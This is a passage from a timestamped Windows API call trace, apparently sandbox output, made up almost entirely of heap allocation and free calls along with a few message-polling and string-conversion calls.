hHeap=0x970000) returned 1 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0238.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0238.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0238.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0238.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0238.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0238.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0238.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fd8 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0238.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55088, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0238.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.845] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0238.845] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0238.846] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fa8 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0238.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550b8 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0238.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0238.848] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0238.848] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0238.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0238.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0238.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0238.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0238.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0238.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0238.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0238.849] 